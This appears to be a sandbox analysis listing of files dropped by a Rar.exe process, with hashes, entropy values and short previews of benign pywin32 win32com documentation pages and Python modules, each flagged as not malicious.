                                                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>win32com</TITLE>.<META NAME="Template" CONTENT="C:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY TEXT="#000000" LINK="#0000ff" VLINK="#0000ff">.<DIR>..<P> Enclose the entire page in UL, so bullets don't indent. --></P>.<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99></H1>.<H2>Python and COM</H2>.<H3>Introduction</H3>.<P>Python has an excellent interface to COM (also known variously as OLE2, ActiveX, etc).</P>.<P>The Python COM package can be used to interface to almost any COM program (such as the MS-Office suite), write servers that can be hosted by any COM client (such as Visual Basic or C++), and has even been used to provide the core ActiveX Scripting Support. </P>...<UL>.<LI>Note that win32com is now released in the win32all installation package. The <A HREF="../win32all/win32all.exe">installation EXE ca
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (301)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                                                  Entropy (8bit):5.3901383302894965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:FIxxlb2SRh1L+Co68YGAJU3fTtABGLTWjtQ9iQsboWP3spwyyLRwY06Fsims:FIPiCvGAJAA6WRacs48pwyyLRw36ers
                                                                                                                                                                                                                                  MD5:C07F8018DCCEFB86169BA4C87A75E0D3
                                                                                                                                                                                                                                  SHA1:21CD87EB1792B6E3179C4D5B3BB5A8EE877C0A72
                                                                                                                                                                                                                                  SHA-256:1CB2278F301A053F742562959C5AF9DCEB8836130180CB19FA536E9128306DDB
                                                                                                                                                                                                                                  SHA-512:68CDF0119C2FAE9220EFC45CD2C0BD2A3CBAAADDECB123247500EB62493AE13693063A45B638575E40FAB802B28CCA4827DC781805A00B9B8835B54F6B0DE751
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Misc win32com Stuff</TITLE>.<META NAME="Version" CONTENT="8.0.3410">.<META NAME="Date" CONTENT="10/11/96">.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\HTML.DOT">.</HEAD>.<BODY TEXT="#000000" BGCOLOR="#ffffff">..<H1>Misc stuff I don.t know where to put anywhere else</H1>.<H4>Client Side Dispatch</H4>.<P>Using win32com.client.Dispatch automatically invokes all the win32com client side "smarts", including automatic usage of generated .py files etc.</P>.<P>If you wish to avoid that, and use truly "dynamic" objects (ie, there is generated .py support available, but you wish to avoid it), you can use win32com.client.dynamic.Dispatch</P>.<B><P>_print_details_() method</B><BR>.If win32com.client.dynamic.Dispatch is used, the objects have a _print_details_() method available, which prints all relevant knowledge about an o
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with LF, NEL line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3253
                                                                                                                                                                                                                                  Entropy (8bit):5.260386145456912
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:FOfl5O+WSjhiHpufYhWH9+0n+uGzo+ymliTV2u:FE7xjhkpuNkft0hYG
                                                                                                                                                                                                                                  MD5:7419E387B22EF6EFACD19177C929CD9D
                                                                                                                                                                                                                                  SHA1:7EDF39A325362956E9D7ED1DAAC5762E52683344
                                                                                                                                                                                                                                  SHA-256:32D4776316513F6881D9D4583D2323A285F950A7574864FF597AB3DC5C4E0F17
                                                                                                                                                                                                                                  SHA-512:7EE74FFFE49868D3D704874EDE54A97FB582A388D60D5E4967B221094CC16470865C13D9461B238AEAA745309CA1E4922B850EFE68004DE106802B846A084031
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>The win32com package</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></H1>.<H1>The win32com package </H1>.<FONT SIZE=2><P>This document describes the win32com package in general terms.</FONT> </P>.<FONT SIZE=2><P>The COM support can be thought of as existing in 2 main portions - the C++ support code (the core PythonCOM module), and helper code, implemented in Python. The total package is known as "win32com".</FONT> </P>.<FONT SIZE=2><P>The win32com support is stand-alone. It does not require Pythonwin.</FONT> </P>.<H2>The win32com package </H2>.<FONT SIZE=2><P>To facilitate an orderly framework, the Python "ni" module has been used, and the entire
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5874
                                                                                                                                                                                                                                  Entropy (8bit):5.006870023723714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:XAb1uKMlaFvYWuAMTzRmhId2FHRXsPWQ8yCH042yACUp/cor4cNKxK3m0+AeGQeF:Q3Fy50rRsPT4Y/ecUe9HTQe0Lkh/d
                                                                                                                                                                                                                                  MD5:8D4BB296B8C8522D9CB068FB681E41AA
                                                                                                                                                                                                                                  SHA1:D43461F8FCC2A4041FFC51F4945697354260B4F9
                                                                                                                                                                                                                                  SHA-256:81B298E39090B915E0FD683BAA5BBEBD8087F0A522679327D860C4609A203819
                                                                                                                                                                                                                                  SHA-512:7BF256A23AADFB185DA27EC66838109B328CE72828DCC5E8E834A1B8F81255CCD9F132430AEB3C21D5B9D660CBE42FAE742B214556233B6ECCCE0C2FCDB23A0B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<HTML>.<HEAD>. <TITLE>win32com.client.VARIANT</TITLE>.</HEAD>.<BODY>..<H2>Introduction</H2>.<p>.win32com attempts to provide a seamless COM interface and hide many COM .implementation details, including the use of COM VARIANT structures. This .means that in most cases, you just call a COM object using normal Python .objects as parameters and get back normal Python objects as results..</p>..<p>.However, in some cases this doesn't work very well, particularly when using."dynamic" (aka late-bound) objects, or when using "makepy" (aka early-bound).objects which only declare a parameter is a VARIANT..</p>..<p>.The <code>win32com.client.VARIANT</code> object is designed to overcome these .problems..</p>..<h2>Drawbacks</h2>.The primary issue with this approach is that the programmer must learn more .about COM VARIANTs than otherwise - they need to know concepts such as .variants being <em>byref</em>, holding arrays, or that some may hold 32bit .unsigned integers while others hold 64bit si
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4883
                                                                                                                                                                                                                                  Entropy (8bit):4.663042468205077
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:mg3XUOq2MdUqRRc+zkgL3TRF5iIyaOrnEbM/+N:moXrq2MdJRK8
                                                                                                                                                                                                                                  MD5:6A55DA3604C17E67D8CF46B93E6C1B7A
                                                                                                                                                                                                                                  SHA1:7E4061CE32AB9265BA5C8A4D0567CA02FDF799E2
                                                                                                                                                                                                                                  SHA-256:B850316AAC162BE68966A1042857D8ACEBB5576758ED7AEA38026B13B24F3F15
                                                                                                                                                                                                                                  SHA-512:A937E6582C9AC2A73FD4CF664A058B75D5A790E5BA9285AA3876E5FF860C8397ECE41173EEE73B9EF955F857E04AD0023E62D475CC454BBF97F41DCB925D25C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Initialization for the win32com package.#..import os.import sys..import pythoncom.import win32api..# flag if we are in a "frozen" build.._frozen = getattr(sys, "frozen", 1 == 0).# pythoncom dumbly defaults this to zero - we believe sys.frozen over it..if _frozen and not getattr(pythoncom, "frozen", 0):. pythoncom.frozen = sys.frozen..# Add support for an external "COM Extensions" path..# Concept is that you can register a seperate path to be used for.# COM extensions, outside of the win32com directory. These modules, however,.# look identical to win32com built-in modules..# This is the technique that we use for the "standard" COM extensions..# eg "win32com.mapi" or "win32com.axscript" both work, even though they do not.# live under the main win32com directory..__gen_path__ = "".__build_path__ = None.### TODO - Load _all_ \\Extensions subkeys - for now, we only read the default.### Modules will work if loaded into "win32comext" path....def SetupEnvironment():. HKEY_LOCA
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1757
                                                                                                                                                                                                                                  Entropy (8bit):4.715819557466049
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:spQNKcrzGsTQc1a65NYPfdBnCHGc4/ymmhxL6m4A51QFCn4Aeu6:vZrzG6C6jYPfdgI/yFht6bKQFC4i6
                                                                                                                                                                                                                                  MD5:6BB00B514891314ED73AA459426522D1
                                                                                                                                                                                                                                  SHA1:7976F1ABD0D639E05AEAC24578C0A82F3B4C5388
                                                                                                                                                                                                                                  SHA-256:7579776B08334DCD4A9E865230FA716598D77B88BAE456D9702D8FA634119B9D
                                                                                                                                                                                                                                  SHA-512:7BC4B37A1BDBAFF1A7A15858982A0A60AE2E94B7B138208A59A6623567D39431D2E848D24CDD5E9CEAB3988BB5262674A71796F4BB947B861EB992C4797AF9C9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Manages a dictionary of CLSID strings to Python classes...Primary use of this module is to allow modules generated by.makepy.py to share classes. @makepy@ automatically generates code.which interacts with this module. You should never need to reference.this module directly...This module only provides support for modules which have been previously.been imported. The gencache module provides some support for loading modules.on demand - once done, this module supports it.....As an example, the MSACCESS.TLB type library makes reference to the.CLSID of the Database object, as defined in DAO3032.DLL. This.allows code using the MSAccess wrapper to natively use Databases...This obviously applies to all cooperating objects, not just DAO and.Access..""".mapCLSIDToClass = {}...def RegisterCLSID(clsid, pythonClass):. """Register a class that wraps a CLSID.. This function allows a CLSID to be globally associated with a class.. Certain module will automatically convert an IDispatch o
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26331
                                                                                                                                                                                                                                  Entropy (8bit):4.662613121389149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xDn8xR5SYxLvnNplhYf8glDkYcA3MRiboE:xr3KthIHDkYwiboE
                                                                                                                                                                                                                                  MD5:70DE4541C80DFC6A27365BF8043D80AB
                                                                                                                                                                                                                                  SHA1:7C4A70512C053FFA695B325FF5C9C12E0D71D41A
                                                                                                                                                                                                                                  SHA-256:21035DE60FD401BC34A28ED96009C7AA04A0738620F9807C9796303F186D89B0
                                                                                                                                                                                                                                  SHA-512:C94BFF9FB70D933E52B66B691770F0F2EECD9FBE42AFBC9B6345344A2137640C3E90B8E88A2C295DDF2FD088A8A56C1C6202A047F8B26BEF8AB118A6BF2C14FF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This module exists to create the "best" dispatch object for a given.# object. If "makepy" support for a given object is detected, it is.# used, otherwise a dynamic dispatch object...# Note that if the unknown dispatch object then returns a known.# dispatch object, the known class will be used. This contrasts.# with dynamic.Dispatch behaviour, where dynamic objects are always used...import sys..import pythoncom.import pywintypes..from . import dynamic, gencache.._PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def __WrapDispatch(. dispatch,. userName=None,. resultCLSID=None,. typeinfo=None,. UnicodeToString=None,. clsctx=pythoncom.CLSCTX_SERVER,. WrapperClass=None,.):. """. Helper function to return a makepy generated class for a CLSID if it exists,. otherwise cope by using CDispatch.. """. assert UnicodeToString is None, "this is deprecated and will go away". if resultCLSID is None:. try:. typeinfo = dispatch.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29075
                                                                                                                                                                                                                                  Entropy (8bit):4.503335395447579
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:zSxuBqXhGnnlZFDg6IZR6Y7ig6ijpDnBScm:zSxREn1VIf6Y7ig6i1jBScm
                                                                                                                                                                                                                                  MD5:0AB057D2A7A2369EC9E19831CC4A1587
                                                                                                                                                                                                                                  SHA1:E683D374922194F72DCC185BEC7DB0C26BBCA0FA
                                                                                                                                                                                                                                  SHA-256:AC4866714136EDAB484F6C46FE8ED65D932CA7A9F045D5E3CA5C50054EF7E7D4
                                                                                                                                                                                                                                  SHA-512:0F140282A96FDF2D10ECB44147CB00F687CF55759D27DB602D9DC65365695292ED5ECB29490A089F89A26D99A96E7B888E0E5CD463D9A9D4938435A7C0DD6398
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Contains knowledge to build a COM object definition...This module is used by both the @dynamic@ and @makepy@ modules to build.all knowledge of a COM object...This module contains classes which contain the actual knowledge of the object..This include parameter and return type information, the COM dispid and CLSID, etc...Other modules may use this information to generate .py files, use the information.dynamically, or possibly even generate .html documentation for objects.."""..#.# NOTES: DispatchItem and MapEntry used by dynamic.py..# the rest is used by makepy.py.#.# OleItem, DispatchItem, MapEntry, BuildCallList() is used by makepy..import datetime.import string.import sys.from keyword import iskeyword..import pythoncom.import winerror.from pywintypes import TimeType...# It isn't really clear what the quoting rules are in a C/IDL string and.# literals like a quote char and backslashes makes life a little painful to.# always render the string perfectly - so just punt an
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20283
                                                                                                                                                                                                                                  Entropy (8bit):4.650536842804007
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:IJzNvQMSutXh+PetXhsYQ4iyz086vDU45NT6jbXVS35shxdUIKyKaEwU63iAllEQ:cfXh+qXhs7pn6jL4psRbi108hDi
                                                                                                                                                                                                                                  MD5:D636DB533FB28417CA5FCFA82852E4D0
                                                                                                                                                                                                                                  SHA1:3A760E015522314A009EA46C35A5491553187077
                                                                                                                                                                                                                                  SHA-256:5346BE9647031E54C09AD20E974E25B4859AA698BC2394F86C2884939FF52189
                                                                                                                                                                                                                                  SHA-512:1EB83A93DA0958438CB591E9C2611E669ABEE72F0C910D528A0E646FD63C01192055E54F8C552C2924AE7CEA294648AFB5DAB5870C44335DB90B4A12D6DA784E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A utility for browsing COM objects... Usage:.. Command Prompt.. Use the command *"python.exe combrowse.py"*. This will display. display a fairly small, modal dialog... Pythonwin.. Use the "Run Script" menu item, and this will create the browser in an. MDI window. This window can be fully resized... Details.. This module allows browsing of registered Type Libraries, COM categories,. and running COM objects. The display is similar to the Pythonwin object. browser, and displays the objects in a hierarchical window... Note that this module requires the win32ui (ie, Pythonwin) distribution to. work...""".import sys..import pythoncom.import win32api.import win32con.import win32ui.from pywin.tools import browser.from win32com.client import util...class HLIRoot(browser.HLIPythonObject):. def __init__(self, title):. super().__init__(name=title).. def GetSubList(self):. return [. HLIHeadingCategory(),. HLI_IEnumMoniker(.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1556
                                                                                                                                                                                                                                  Entropy (8bit):4.386271235738792
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:JHextFm1Qb9j3JJ73fz5IQ4Xld8d55NlOCs4Dg:JextFHbR3J93f9yld8dbNlOCFg
                                                                                                                                                                                                                                  MD5:8E0D0CE09D9692FA8C0D21F2731EA363
                                                                                                                                                                                                                                  SHA1:323CF31B86CB7B914C4D1E535226EB4492DE823B
                                                                                                                                                                                                                                  SHA-256:F5DE4E185C02120C7D007F8BBA3FF79C05FBE661155CDFF43E65805E52F82BB4
                                                                                                                                                                                                                                  SHA-512:9485F97F637A270117E046998A8E9A48E171FB91E1B573190234235C7D8A88BA1A2F79E71528205CCFCD7160A5D5E92DA4E24282EDA9601C66BE3BB5DBFAB019
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for working with Connections""".import pythoncom.import win32com.server.util...class SimpleConnection:. "A simple, single connection object".. def __init__(self, coInstance=None, eventInstance=None, eventCLSID=None, debug=0):. self.cp = None. self.cookie = None. self.debug = debug. if not coInstance is None:. self.Connect(coInstance, eventInstance, eventCLSID).. def __del__(self):. try:. self.Disconnect(). except pythoncom.error:. # Ignore disconnection as we are torn down.. pass.. def _wrap(self, obj):. useDispatcher = None. if self.debug:. from win32com.server import dispatcher.. useDispatcher = dispatcher.DefaultDebugDispatcher. return win32com.server.util.wrap(obj, useDispatcher=useDispatcher).. def Connect(self, coInstance, eventInstance, eventCLSID=None):. try:. oleobj = coInstance._oleobj_. except At
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28118
                                                                                                                                                                                                                                  Entropy (8bit):4.504848551157066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6UPqrCv6OYlSK5gZ5iE0aqsd2FZjbeyJOmM:6UP+7lh4iKjY56
                                                                                                                                                                                                                                  MD5:705FBE20E3B316291D0B873062F8B7EF
                                                                                                                                                                                                                                  SHA1:11842E4C3753557B894E4FCE3E2BCB6C9D684559
                                                                                                                                                                                                                                  SHA-256:1482C2802461E38DA4AD37169ACC6B73D8ECA9B343269ED73794C98DD72CE682
                                                                                                                                                                                                                                  SHA-512:A7BD1CDA28A3D654A65CAC65C35F7E674304F2CA834F761C7B9C345ED69FAA80D6B4EE6FA496DB6AD1457C0EC1042E85368B009056E621AC72A35B204793A299
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Support for dynamic COM client support...Introduction. Dynamic COM client support is the ability to use a COM server without. prior knowledge of the server. This can be used to talk to almost all. COM servers, including much of MS Office... In general, you should not use this module directly - see below...Example. >>> import win32com.client. >>> xl = win32com.client.Dispatch("Excel.Application"). # The line above invokes the functionality of this class.. # xl is now an object we can use to talk to Excel.. >>> xl.Visible = 1 # The Excel window becomes visible...""".import traceback.import types..import pythoncom # Needed as code we eval() references it..import win32com.client.import winerror.from pywintypes import IIDType..from . import build..debugging = 0 # General debugging.debugging_attr = 0 # Debugging dynamic attribute lookups...LCID = 0x0..# These errors generally mean the property or method exists,.# but can't be used in this context - eg, property instead of a method, et
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27995
                                                                                                                                                                                                                                  Entropy (8bit):4.499790024046918
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Ug3bsm2+Mv4JRa5jL8b0ND4/KzlRypOekv5w/Symo3h4V:UdmRJRa5jQTo32yqLmo3c
                                                                                                                                                                                                                                  MD5:AB26D2324054631E766D1CD1F2B6A3E9
                                                                                                                                                                                                                                  SHA1:E935A7BF217D050F1E60E386B60B69E18B7A9E0E
                                                                                                                                                                                                                                  SHA-256:0588F8AD9E14AB84FCB6E1182483DF44363EAD486D4E9A3AB198603FE0D9B2B7
                                                                                                                                                                                                                                  SHA-512:08E8CB6736FF8EF4C92FC360881CBA3E0ABF29EEE1213DAD7EC35A73C1F42600CB2559DF492354A60DABD02480AE3E7C76819BE518748F19479B804220864CA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Manages the cache of generated Python code...Description. This file manages the cache of generated Python code. When run from the. command line, it also provides a number of options for managing that cache...Implementation. Each typelib is generated into a filename of format "{guid}x{lcid}x{major}x{minor}.py".. An external persistant dictionary maps from all known IIDs in all known type libraries. to the type library itself... Thus, whenever Python code knows the IID of an object, it can find the IID, LCID and version of. the type library which supports it. Given this information, it can find the Python module. with the support... If necessary, this support can be generated on the fly...Hacks, to do, etc. Currently just uses a pickled dictionary, but should used some sort of indexed file.. Maybe an OLE2 compound file, or a bsddb file?.""".import glob.import os.import sys.from importlib import reload..import pythoncom.import pywintypes.import win32com.import win32com.cli
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56188
                                                                                                                                                                                                                                  Entropy (8bit):4.320118098845648
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:YhPCfBkATLWxO4mkAk8fliyeMQZr3aC5wnKT3:CPZATL9kAkqliyeb3adni3
                                                                                                                                                                                                                                  MD5:9F97DC21D09772797082D4F3C5967A53
                                                                                                                                                                                                                                  SHA1:770E52F9575CFC0CC8E0528781A8DDD527B77A3E
                                                                                                                                                                                                                                  SHA-256:06AC56208C85FDD7639A69D75E39365613AB36126B4E6456EE69CF78F38DC982
                                                                                                                                                                                                                                  SHA-512:42D5A3E74C8860FC17B4B81E524A0DAE9012F9134788B7AA853B3F323A53D9D65F4434C102D3DC92D3D8BA662568C2FF3177BA8327E8F27FCA7308FA4D3DACC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""genpy.py - The worker for makepy. See makepy.py for more details..This code was moved simply to speed Python in normal circumstances. As the makepy.py.is normally run from the command line, it reparses the code each time. Now makepy.is nothing more than the command line handler and public interface...The makepy command line etc handling is also getting large enough in its own right!."""..# NOTE - now supports a "demand" mechanism - the top-level is a package, and.# each class etc can be made individually..# This should eventually become the default..# Then the old non-package technique should be removed..# There should be no b/w compat issues, and will just help clean the code..# This will be done once the new "demand" mechanism gets a good workout..import os.import sys.import time..import pythoncom.import win32com..from . import build..error = "makepy.error".makepy_version = "0.5.01" # Written to generated file...GEN_FULL = "full".GEN_DEMAND_BASE = "demand(base)".GEN_DEMAND_CHI
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14916
                                                                                                                                                                                                                                  Entropy (8bit):4.427768304708846
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:GBeBZEoC2NjxKCFYKWi1bY5ydcAA6cO6chZ+7PM8HrpHCqefFRw0/gQM40da9S3:qIZEN2NjxDJ1RLA6j6qk7PMt70duo
                                                                                                                                                                                                                                  MD5:F7E799C6EAA5CAB3336AB136AF4E25D7
                                                                                                                                                                                                                                  SHA1:CC4B89EFC334E3D6CCB9FBFB6F4FED369DDCCA42
                                                                                                                                                                                                                                  SHA-256:BDE72A1C6118DD98094BDB8966A7C76F6019FBFBF81F068CA06AC4428D86AFF9
                                                                                                                                                                                                                                  SHA-512:F5301AD7048CBEB267BC33533BEDB2577923150788E5D229D67E7FD79E7C49DC65C67A728B7EA39C74E777A93BD51D5931412A1DFADBF764691C48D5B30103C2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Originally written by Curt Hagenlocher, and various bits.# and pieces by Mark Hammond (and now Greg Stein has had.# a go too :-)..# Note that the main worker code has been moved to genpy.py.# As this is normally run from the command line, it reparses the code each time..# Now this is nothing more than the command line handler and public interface...# XXX - TO DO.# XXX - Greg and Mark have some ideas for a revamp - just no.# time - if you want to help, contact us for details..# Main idea is to drop the classes exported and move to a more.# traditional data driven model..."""Generate a .py file from an OLE TypeLibrary file.... This module is concerned only with the actual writing of. a .py file. It draws on the @build@ module, which builds. the knowledge of a COM interface...""".usageHelp = """ \..Usage:.. makepy.py [-i] [-v|q] [-h] [-u] [-o output_file] [-d] [typelib, ...].. -i -- Show information for the specified typelib... -v -- Verbose output... -q
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6316
                                                                                                                                                                                                                                  Entropy (8bit):4.369023441818291
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ABpBQDukn7UHv67dMegMbF0ewnXPN8MuAKIWbVpqBY7gPSZRZaXRM/1zwlBvaUND:AjkIHq5QNpsIWbVoY8PqwnvaUND
                                                                                                                                                                                                                                  MD5:8483D39CDA09E51B898036763A7D4FE2
                                                                                                                                                                                                                                  SHA1:993EB217EBC1D13832B69E029CAAF6257EE6DA56
                                                                                                                                                                                                                                  SHA-256:3C07B55189D333054A9D3C537A9DA3B8BFC68E349B4E884EE33768780D9341B7
                                                                                                                                                                                                                                  SHA-512:0596A519B8B27E28C2BD443D60790A20ECB34E107E0CB058A71919C46C5F8BB338F5F8167A247770E2F1BC9C69BEDB2C1FCB39A647853C364D1D53F44B8C5FD4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for selecting and enumerating the Type Libraries installed on the system."""..import pythoncom.import win32api.import win32con...class TypelibSpec:. def __init__(self, clsid, lcid, major, minor, flags=0):. self.clsid = str(clsid). self.lcid = int(lcid). # We avoid assuming 'major' or 'minor' are integers - when. # read from the registry there is some confusion about if. # they are base 10 or base 16 (they *should* be base 16, but. # how they are written is beyond our control.). self.major = major. self.minor = minor. self.dll = None. self.desc = None. self.ver_desc = None. self.flags = flags.. # For the SelectList. def __getitem__(self, item):. if item == 0:. return self.ver_desc. raise IndexError("Cant index me!").. def __lt__(self, other): # rich-cmp/py3k-friendly version. me = (. (self.ver_desc or "").lower(),. (self.desc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9524
                                                                                                                                                                                                                                  Entropy (8bit):4.807103058801087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iNLkApkQ5JTIeB/vVuvjpCmc2wyyvJlBaG3e4yj2m6D5kzyWxA+KllnWbCk1eqUy:iKQIY0r40iFuT2BUWxlW11DHrP
                                                                                                                                                                                                                                  MD5:14CC505029C95BF56782803508B2B055
                                                                                                                                                                                                                                  SHA1:2CDAA4273F079B71549BF0246824849C2A025C5F
                                                                                                                                                                                                                                  SHA-256:26217E6B780B392E3B13E64585BDB0C3120F75CE0C9E86FD20E55B59F6F66509
                                                                                                                                                                                                                                  SHA-512:9C8780DD8C4E8EFB8C6257CEB5D0FF890AA2224CE840393C1A1F24A1EF813090DC68C34252B2F2D0BE223E234C2853C77C14207A00D39FAF04F2626708F49255
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import commctrl.import pythoncom.import win32api.import win32con.import win32ui.from pywin.mfc import dialog...class TLBrowserException(Exception):. "TypeLib browser internal error"...error = TLBrowserException..FRAMEDLG_STD = win32con.WS_CAPTION | win32con.WS_SYSMENU.SS_STD = win32con.WS_CHILD | win32con.WS_VISIBLE.BS_STD = SS_STD | win32con.WS_TABSTOP.ES_STD = BS_STD | win32con.WS_BORDER.LBS_STD = (. ES_STD | win32con.LBS_NOTIFY | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL.).CBS_STD = ES_STD | win32con.CBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL..typekindmap = {. pythoncom.TKIND_ENUM: "Enumeration",. pythoncom.TKIND_RECORD: "Record",. pythoncom.TKIND_MODULE: "Module",. pythoncom.TKIND_INTERFACE: "Interface",. pythoncom.TKIND_DISPATCH: "Dispatch",. pythoncom.TKIND_COCLASS: "CoClass",. pythoncom.TKIND_ALIAS: "Alias",. pythoncom.TKIND_UNION: "Union",.}..TypeBrowseDialog_Parent = dialog.Dialog...class TypeBrowseDialog(TypeBrowseDialog_Parent):. "B
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3339
                                                                                                                                                                                                                                  Entropy (8bit):4.691100940722656
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zJpegE/6zsuCxcGHTOc6bLuUcvFT7OWFDTddwy:zliLuGcGiJmrrmy
                                                                                                                                                                                                                                  MD5:76160F2827C8F53E210662AF76460E0A
